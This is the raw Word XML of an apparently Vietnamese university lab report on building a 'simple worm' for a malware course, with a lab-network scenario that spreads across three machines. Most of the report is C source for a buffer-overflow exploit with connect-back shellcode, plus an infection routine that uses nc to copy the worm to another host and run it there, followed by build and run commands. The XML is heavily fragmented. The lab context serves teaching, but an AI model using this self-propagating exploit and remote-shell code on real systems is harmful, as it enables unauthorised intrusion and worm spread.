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2F83739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44677">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Cơ chế hoạt động của mã độc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57DD5544" w14:textId="76594201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</w:t>
      </w:r>
      <w:r w:rsidR="00EC23EE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16956">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> (Session 0</w:t>
      </w:r>
      <w:r w:rsidR="00EC23EE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00B16956">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1256D11A" w14:textId="05D79DA6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C23EE">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Simple worm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7529A711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EC23EE">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00EE72EC">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF12B3">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00EE72EC">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>03</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF12B3">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>/2</w:t>
      </w:r>
      <w:r w:rsidR="00EE72EC">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FCEAD3" w14:textId="598315C0" w:rsidR="00B16956" w:rsidRPr="00787643" w:rsidRDefault="00B16956" w:rsidP="00B16956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482BE31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EE72EC" w:rsidRPr="00EE72EC">
        <w:t>NT230.N21.ANTN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46"/>
        <w:gridCol w:w="2414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3FD2E0E4" w:rsidR="008D0072" w:rsidRDefault="003C2417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31" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F74B605" w14:textId="0F8090E0" w:rsidR="008D0072" w:rsidRDefault="003C2417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8" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="69359CA4" w14:textId="6F794066" w:rsidR="008D0072" w:rsidRDefault="003C2417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1C179A3C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0CD653DA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5242AC61" w:rsidR="008D0072" w:rsidRDefault="008D0072" w:rsidP="00FF12B3">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="6480"/>
              </w:tabs>
            </w:pP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721AA0E0" w:rsidR="0027532A" w:rsidRDefault="0027532A" w:rsidP="00E96342">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Kịch bản </w:t>
            </w:r>
            <w:r w:rsidR="00FA0470">
              <w:t>C</w:t>
            </w:r>
            <w:r w:rsidR="0059710E">
              <w:t>3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6EC9E76E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9271EF6" w14:textId="0AC2D09E" w:rsidR="0027532A" w:rsidRPr="00B00619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4389E5C2" w14:textId="70892BD1" w:rsidR="0027532A" w:rsidRPr="004067CC" w:rsidRDefault="0027532A" w:rsidP="004A55AE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1D87D3EC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E3A8CC4" w14:textId="105810C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7CD217D1" w14:textId="01828109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140119D4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494421D3" w14:textId="538798E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684CDDA" w14:textId="4B72A510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094899EF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CA48FA5" w14:textId="15E9C74A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C6C7EBA" w14:textId="3B910691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2C968C04" w:rsidR="00F13188" w:rsidRDefault="007D281E" w:rsidP="00F13188">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Kịch bản </w:t>
      </w:r>
      <w:r w:rsidR="00FA0470">
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="007D5063">
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70096F6A" w14:textId="7FD2925A" w:rsidR="00F84406" w:rsidRDefault="007D5063" w:rsidP="00BA539D">
      <w:r>
        <w:t>Nguồn tham khảo: ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4589BF" w14:textId="74D11963" w:rsidR="007D5063" w:rsidRDefault="007D5063" w:rsidP="00BA539D">
      <w:r w:rsidRPr="007D5063">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29F3E19C" wp14:editId="7AC1B887">
            <wp:extent cx="6115050" cy="344932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F08" w14:textId="7F0581A6" w:rsidR="007D5063" w:rsidRDefault="007D5063" w:rsidP="00BA539D">
      <w:r>
        <w:t xml:space="preserve">Và với hướng dẫn của thầy, </w:t>
      </w:r>
      <w:r w:rsidR="00E33AA4">
        <w:t>ta sẽ thực hiện việc lây nhiễm bằng cách, thực hiện leo vào máy 2 sau đó lây nhiễm sang máy 3 có 2 cách:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C924559" w14:textId="463CB6F0" w:rsidR="00E33AA4" w:rsidRDefault="00E33AA4" w:rsidP="00BA539D">
      <w:r>
        <w:t>Cách 1: sau khi lây nhiễm máy 2 thì ta sẽ thực hiện cố định một ip máy 3 để tự động worm leo sang (đã biết ip từ trước), sau đó thực hiện gọi remote để truy cập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16568100" w14:textId="3A47B910" w:rsidR="003371FA" w:rsidRDefault="00E33AA4" w:rsidP="00BA539D">
      <w:r>
        <w:t xml:space="preserve">Cách 2: Sau khi lây nhiễm máy 2 thì ta sẽ thực hiện scan các ip có trong subnet mà máy ta đã lây nhiễm, từ đó thực hiện việc lan truyền </w:t>
      </w:r>
      <w:r w:rsidR="003371FA">
        <w:t>tự động, cuối cùng gọi remote để truy cập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9361C4" w14:textId="569E18A1" w:rsidR="003371FA" w:rsidRDefault="003371FA" w:rsidP="00BA539D">
      <w:r>
        <w:t>Ở đây, ta sẽ chọn cách 1 do đã được cung cấp thông tin từ ip máy 3 trên vlab để thực hiện</w:t>
      </w:r>
      <w:r w:rsidR="003A6B19">
        <w:t>. Việc thực hiện truyền worm ta sẽ thực hiện bằng lệnh “nc” với chức năng gửi và nhận file để thực hiện lây nhiễm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A23C0F1" w14:textId="091F9590" w:rsidR="003A6B19" w:rsidRDefault="003A6B19" w:rsidP="00BA539D">
      <w:r>
        <w:t xml:space="preserve">Đầu tiên ta sẽ thực hiện cải tiến code: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB96319" w14:textId="3D4AD41F" w:rsidR="003A6B19" w:rsidRDefault="003A6B19" w:rsidP="00BA539D">
      <w:r>
        <w:t>Ở câu C2 ta đã lây nhiễm được được một máy và ta thực hiện chỉnh hàm main thành hàm Exploit và thực hiện code thêm 1 hàm lây nhiễm là hàm Infect, ngoài ra để kiểm tra ta sẽ thực hiện code hàm kiểm tra là Check_action:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031844AC" w14:textId="523C5D2D" w:rsidR="003A6B19" w:rsidRDefault="003A6B19" w:rsidP="00BA539D">
      <w:r>
        <w:t>Dưới đây là đoạn code của chương trình: (phần giải thích các hành động được trình bày trong chương trình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C384D5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lastRenderedPageBreak/>
        <w:t>#include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&lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FB283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&lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C43AA1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&lt;string.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE2015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&lt;netdb.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5A222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&lt;netinet/in.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDDDB5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93434B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BUFFER_SIZE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1024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D6BBB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NAME_SIZE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2048</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EC9C5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BUF_SIZE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1064</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A36CAA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308B3F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shellcode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FEDFCF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80DE2C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7C1A05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A32193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\xB9\x11\x11\x11\x11\x81\xF1\x1B\x40\x11\x17\x51\x31\xC9\x66\x68\x11\x5c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EFDBEA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788C426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4D99C6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B52EB6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71D6DD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F0AA28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609BFF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F16B6B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56D06C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2A95716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57E9E3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58878C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           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\x01\xcd\x80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F8F1BA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023AA1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// standard offset (probably must be modified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2340C31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 xml:space="preserve"> RET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0xbffff28b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068A278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D1A058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// function to check if exploit succeeded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A54114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Check_action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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36285C1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560A84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value_check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8249D2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value_check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*)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getenv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"SUCCESS"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AE00E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value_check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!=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&amp;&amp; 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value_check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] ==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'Y'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165F4B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6F6AC76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E71BFF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CDE746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D25194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34825B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1DBC4A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// exploit function to send buffer to victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17143F7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unsigned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callback_ip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unsigned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callback_port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ED2A6C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7255A44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5A8CB67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6341291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5D1DE66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4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hostent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host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F4DCBB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68E05F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187118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    /*if (argc != 3) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B7F7C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        printf("Usage: %s target-ip port \n", argv[0]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA96CA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        return -1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BB0B7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    }*/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB33C7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023FE5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filling buffer with NOPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE150A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memset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0x90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1DF287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91F963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Modify the connectback ip address and port. In this case, the shellcode connects to 192.168.2.101 on port 17*256+92=4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD1F4E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shellcode[33] = 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AC00C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shellcode[34] = 81;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A5BB9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shellcode[35] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1B452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shellcode[36] = 6;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6739140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3C1499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shellcode[39] = 17;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7931473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shellcode[40] = 92;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728745D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A8EBF4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copying shellcode into buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614D5BA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shellcode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shellcode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shellcode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) -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FC2642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F89B68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Copying the return address multiple times at the end of the buffer...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312C9BC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901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;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;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+=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76124B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4CA714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*((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]) =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RET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56765E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ABC93C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0x0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F7EED4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360788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creating socket...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FDC44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(AF_INET, SOCK_STREAM,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060298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425969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10F704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85347E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DFB642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03D2AB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59BA6F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create remote</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F60087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state Protocolfamily , then converting the hostname or IP address, and getting  port number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7231E82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AF_INET;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA3934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remote.sin_addr = *((struct in_addr*)host-&gt;h_addr);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415601B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remote.sin_port = htons(atoi(argv[2]));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8C3A6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inet_aton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, &amp;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s_addr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DAA078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EEF3B5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AC3E06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connecting with destination host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3784B5E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connect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)) == -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943E4C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CAD133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6C70C4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"Error: connect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D2FF8A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4641E1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2FE2AA3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sending exploit string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A8449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35B209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== -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9FDA68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2EB78C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E85CA1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"sending data failed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DA736C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2EDBA1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5084AD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A2AD43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checking if exploit succeeded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481C4D3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putenv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"SUCCESS=Y"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0CA63B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Check_action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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6104B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7FE4C5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announce success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C2F6E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"Exploit succeeded!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F87B5C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456028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22AC4126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454C208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489A19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announce failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F089B3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"Exploit failed!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83818E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B21048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CB887D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E40FFD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closing socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA33A1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6F74DC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86ECC1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1D9771D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5F6C10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6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>// infecting function to send buffer to victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76593DA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arg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589E39E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91F584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289CEE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0BD3D94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sock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client_size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59432C5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server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109049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5202A9F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B3E512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announce infection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BC18D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"Infecting...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B12AC0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65D746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creating socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A47B60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sock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(AF_INET, SOCK_STREAM,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C1E711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sock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6E4B38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EC822C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EEAF2E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674594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89129A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3F8662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server settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B73C89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server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s_addr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INADDR_ANY;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E46F8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server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AF_INET;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9759D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server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4444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25F92F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7959DD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infection anouncement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D51CF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"Infection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7C5241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10689E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sending shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E647C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"pwd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5D633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4B4AD8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2718E0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9634E2F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1BB232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340BDA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15B9714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63AE1E6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get into dir</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF8DDC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"get into dir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5607E4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1D9F82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321117F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"nc -l 10001 &gt; c3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18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4D1B3A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18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BE6D63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"Sending worm...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1B55BD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sleep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92239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26C7728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3623F37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system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"nc 10.81.0.8 10001 &lt; c3"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C3F6C4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"./c3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829B00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check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2535E1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bytes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534CF51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4A6251D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38E971B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EBCCC4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BF4B1B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closing socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55531DC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sock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0AA937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lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE8283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75B22F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main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E5A246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0333F4E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7B4778E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pthread_t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thread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7FF5B26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independent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FC9CF4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callback_ip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16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4C223AC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8369A0C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generate the independent thread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C09474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independent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pthread_create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(&amp;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thread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40BF4A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9B6056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(;;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F9627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684304E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announce exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1F3EE5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"Starting exploit...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FBCCD8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924A08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exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2E827B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"10.81.0.8"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5000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"10.81.0.6"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4444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) ==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C5067B3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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A70EA6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announce success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE9E13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"Exploit succeeded!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9724FA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pthread_join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thread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1659A0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independent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pthread_create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(&amp;</w:t>
      </w:r>
      <w:r w:rsidRPr="003A6B19">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>thread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3A6B19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1D1A28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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5255F009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45E6756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{   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3533CB30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 w:rsidRPr="003A6B19">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>// announce failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F06BC31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"Exploit failed!</w:t>
      </w:r>
      <w:r w:rsidRPr="003A6B19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3A6B19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06E6FC7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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C3062E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DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>getchar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();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD0C0DD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3A6B19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3A6B19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3A6B19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6683DA4A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B5A3A52" w14:textId="77777777" w:rsidR="003A6B19" w:rsidRPr="003A6B19" w:rsidRDefault="003A6B19" w:rsidP="003A6B19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3A6B19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4157B412" w14:textId="6E2A52A9" w:rsidR="003A6B19" w:rsidRDefault="003A6B19" w:rsidP="00BA539D"/>
    <w:p w14:paraId="343FB054" w14:textId="7F569432" w:rsidR="001969AB" w:rsidRDefault="003A6B19" w:rsidP="00BA539D">
      <w:r>
        <w:t xml:space="preserve">Build chương trình: Do có sử dụng hàm </w:t>
      </w:r>
      <w:r w:rsidR="001969AB">
        <w:t xml:space="preserve">pthread nên khi thực hiện build chương trình ta sẽ thực hiện lệnh: </w:t>
      </w:r>
      <w:r w:rsidR="001969AB" w:rsidRPr="001969AB">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>gcc -o c3 c3.c -pthread</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F356AFF" w14:textId="77777777" w:rsidR="00BF20B1" w:rsidRDefault="00BF20B1" w:rsidP="00BA539D"/>
    <w:p w14:paraId="6F069904" w14:textId="39736312" w:rsidR="003A6B19" w:rsidRDefault="00DB27D2" w:rsidP="00BA539D">
      <w:r>
        <w:t>Thực thi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAC8CAC" w14:textId="2A172667" w:rsidR="00DB27D2" w:rsidRDefault="00DB27D2" w:rsidP="00BA539D">
      <w:r>
        <w:t>Kết quả tại máy 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5528F52A" w14:textId="4BCD1CFA" w:rsidR="00DB27D2" w:rsidRDefault="00DB27D2" w:rsidP="00BA539D">
      <w:r>
        <w:t xml:space="preserve">Chạy lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB27D2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>nc -l 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283F5185" w14:textId="16DD8C66" w:rsidR="00DB27D2" w:rsidRDefault="00DB27D2" w:rsidP="00BA539D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="488382E8" wp14:editId="3CD3F2D2">
            <wp:extent cx="6009950" cy="215537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28" r="34289" b="5765"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6025968" cy="216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FD5E8" w14:textId="7A7A4440" w:rsidR="00DB27D2" w:rsidRDefault="00DB27D2" w:rsidP="00BA539D"/>
    <w:p w14:paraId="3F994708" w14:textId="2951858D" w:rsidR="00DB27D2" w:rsidRDefault="00DB27D2" w:rsidP="00BA539D">
      <w:r>
        <w:t xml:space="preserve">Chạy lệnh </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB27D2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>./c3 10.81.0.7 5000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D945CB" w14:textId="31A5824D" w:rsidR="00DB27D2" w:rsidRDefault="00DB27D2" w:rsidP="00DB27D2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C563ACC" wp14:editId="111D71DA">
            <wp:extent cx="5981700" cy="20831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6" r="70306" b="53250"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6009070" cy="20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4901A" w14:textId="3998FDE7" w:rsidR="00DB27D2" w:rsidRDefault="00DB27D2" w:rsidP="00DB27D2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D515332" w14:textId="256CF013" w:rsidR="00DB27D2" w:rsidRDefault="00DB27D2" w:rsidP="00DB27D2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả tại máy 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F42C538" w14:textId="1771DA5D" w:rsidR="00DB27D2" w:rsidRDefault="00DB27D2" w:rsidP="00DB27D2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="225E666F" wp14:editId="1DD88BA4">
            <wp:extent cx="5998029" cy="1652780"/>
            <wp:effectExtent l="0" t="0" r="3175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4" r="73145" b="36609"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6036298" cy="16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D5B7" w14:textId="045D7C3D" w:rsidR="00DB27D2" w:rsidRDefault="00DB27D2" w:rsidP="00DB27D2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1173F0D4" w14:textId="3ED31BFE" w:rsidR="00DB27D2" w:rsidRDefault="00DB27D2" w:rsidP="00DB27D2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Kết quả tại máy 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E5B5D1" w14:textId="01BB494C" w:rsidR="00DB27D2" w:rsidRDefault="001B6632" w:rsidP="00DB27D2">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="142B01B6" wp14:editId="4C04FFDC">
            <wp:extent cx="6022064" cy="10178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1" r="74148" b="84150"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6102266" cy="10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8DC2" w14:textId="77777777" w:rsidR="00BF20B1" w:rsidRDefault="00BF20B1" w:rsidP="004F64FD">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72980AFE" w14:textId="77777777" w:rsidR="00BF20B1" w:rsidRDefault="00BF20B1" w:rsidP="004F64FD">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="064F2715" w14:textId="4EFA478F" w:rsidR="002D0E59" w:rsidRDefault="004F64FD" w:rsidP="004F64FD">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/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(trong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NT101.K11.ANTT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2" w:name="OLE_LINK29"/>
      <w:bookmarkStart w:id="3" w:name="OLE_LINK30"/>
      <w:r>
        <w:t>xây dựng</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3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3"/>
      <w:footerReference w:type="default" r:id="rId14"/>
      <w:headerReference w:type="first" r:id="rId1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A66A" w14:textId="77777777" w:rsidR="000E3E82" w:rsidRDefault="000E3E82" w:rsidP="00572592">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="322974FF" w14:textId="77777777" w:rsidR="000E3E82" w:rsidRDefault="000E3E82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EEB6EE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>Cơ chế hoạt động của mã độc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51EEB6EE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544677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gram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chế hoạt động của mã độc</w:t>
                    </w:r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56E2" w14:textId="77777777" w:rsidR="000E3E82" w:rsidRDefault="000E3E82" w:rsidP="00572592">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5D4AF88E" w14:textId="77777777" w:rsidR="000E3E82" w:rsidRDefault="000E3E82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FDFCCD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EC23EE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>:</w:t>
    </w:r>
    <w:r w:rsidR="00EC23EE">
      <w:rPr>
        <w:rFonts w:eastAsia="Adobe Gothic Std B"/>
        <w:b/>
        <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:t xml:space="preserve"> Simple Worm</w:t>
    </w:r>
    <w:r w:rsidR="00162043">
      <w:rPr>
        <w:rFonts w:eastAsia="Adobe Gothic Std B"/>
        <w:b/>
        <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
      </w:rPr>
      <w:tab/>
      <w:t>Nhóm 0</w:t>
    </w:r>
    <w:r w:rsidR="00CD71F1">
      <w:rPr>
        <w:rFonts w:eastAsia="Adobe Gothic Std B"/>
        <w:b/>
        <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF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3E82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0C1D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69AB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32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B81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1FA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673FF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A6B19"/>
    <w:rsid w:val="003A76F4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417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0FB0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06F45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3EBA"/>
    <w:rsid w:val="00536101"/>
    <w:rsid w:val="00541A11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9710E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36E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51FE"/>
    <w:rsid w:val="00696078"/>
    <w:rsid w:val="006A01B0"/>
    <w:rsid w:val="006A2C74"/>
    <w:rsid w:val="006A4903"/>
    <w:rsid w:val="006A5D16"/>
    <w:rsid w:val="006A5E62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265C3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101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5063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16FC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92A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625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18C6"/>
    <w:rsid w:val="00B42EB9"/>
    <w:rsid w:val="00B4482B"/>
    <w:rsid w:val="00B47E39"/>
    <w:rsid w:val="00B47FD8"/>
    <w:rsid w:val="00B50791"/>
    <w:rsid w:val="00B52169"/>
    <w:rsid w:val="00B52E29"/>
    <w:rsid w:val="00B52EE2"/>
    <w:rsid w:val="00B53A43"/>
    <w:rsid w:val="00B5445A"/>
    <w:rsid w:val="00B56AFE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3F8C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1499"/>
    <w:rsid w:val="00BF20B1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49EC"/>
    <w:rsid w:val="00CD71F1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7D2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5BA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3AA4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3EE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EC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06"/>
    <w:rsid w:val="00F84456"/>
    <w:rsid w:val="00F8653C"/>
    <w:rsid w:val="00F8656D"/>
    <w:rsid w:val="00F86CE9"/>
    <w:rsid w:val="00F87054"/>
    <w:rsid w:val="00F92E2E"/>
    <w:rsid w:val="00F93291"/>
    <w:rsid w:val="00F93BD4"/>
    <w:rsid w:val="00F942F4"/>
    <w:rsid w:val="00F94BF8"/>
    <w:rsid w:val="00F94EFC"/>
    <w:rsid w:val="00F96E43"/>
    <w:rsid w:val="00FA0470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8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27</cp:revision>
  <cp:lastPrinted>2019-03-26T14:54:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-11T04:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-31T07:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>